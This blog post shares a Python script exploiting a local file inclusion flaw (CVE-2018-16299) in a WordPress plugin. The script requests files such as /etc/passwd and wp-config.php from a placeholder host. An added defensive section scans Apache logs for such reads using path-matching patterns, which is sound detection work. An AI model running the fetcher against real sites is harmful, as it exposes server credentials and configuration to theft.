Python Script: CVE-2018-16299

    Sort of an odd one, I'm not exactly sure why though.  I wrote this up to exploit an LFI vulnerability in the Localize My Post plugin for WordPress.  You populate the path.txt file with your typical goodies:  /etc/passwd, /etc/hosts, etc., each on its own line, of course.  I also included /var/www/html/wp-config.php but for some reason, it wouldn't grab it.  I thought it was some sort of protection mechanism but as I looked around, including in the apache log file, it was getting 200 OK.  I moved the file into /etc/ and it worked, but in place or in /tmp, no luck.  Regardless, it still grabs l00t; just change the IP address.  You can just as easily use curl as well -- it's just a bit quicker if you're trying to grab multiple files at once.  

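    import requests

    # Placeholder: the post does not show this value.
    # Base URL of the request; each path from path.txt is appended to it.
    host = '<base URL>'
    filepath = 'path.txt'

    with open(filepath) as f:
        # One GET request per non-empty line of path.txt
        for line in f:
            path = line.strip()
            if not path:
                continue
            r = requests.get(host + path)
            print(r.text)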
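
Seen from the server side, a script like this leaves one GET per requested path in the Apache access log, usually all from one client within a short time. The following is an added example, not code from the original post: it scans access-log lines for query values that look like local file paths and flags clients that pulled several with 200 OK. The log lines are constructed, and the `/example.php` endpoint and `file` parameter are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not from the post).
# The "/example.php" endpoint and the "file" parameter are hypothetical.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2020:10:00:01 +0000] "GET /example.php?file=/etc/passwd HTTP/1.1" 200 1432 "-" "python-requests/2.22.0"
203.0.113.7 - - [01/Jan/2020:10:00:01 +0000] "GET /example.php?file=/etc/hosts HTTP/1.1" 200 221 "-" "python-requests/2.22.0"
203.0.113.7 - - [01/Jan/2020:10:00:02 +0000] "GET /example.php?file=%2Fvar%2Fwww%2Fhtml%2Fwp-config.php HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
198.51.100.4 - - [01/Jan/2020:10:00:05 +0000] "GET /?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 404 310 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# A value that is an absolute path into a system or web root, or that walks up directories.
SUSPICIOUS = re.compile(r'^/(etc|proc|var|tmp|home|root)/|(^|/)\.\.(/|$)|wp-config\.php$')

def find_file_reads(log_text):
    """Return {client_ip: [(status, size, decoded_value), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded paths
            if SUSPICIOUS.search(value):
                hits[m.group("ip")].append((int(m.group("status")), m.group("size"), value))
    return dict(hits)

def bulk_readers(hits, threshold=3):
    """Clients that requested `threshold` or more distinct paths with 200 OK."""
    return sorted(ip for ip, rows in hits.items()
                  if len({v for s, _, v in rows if s == 200}) >= threshold)

if __name__ == "__main__":
    found = find_file_reads(SAMPLE_LOG)
    for ip, rows in found.items():
        for status, size, value in rows:
            print(ip, status, size, value)
    print("bulk:", bulk_readers(found))
```

The response size is kept alongside the status because a 200 in the log does not by itself show that file contents were returned.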

    © 2020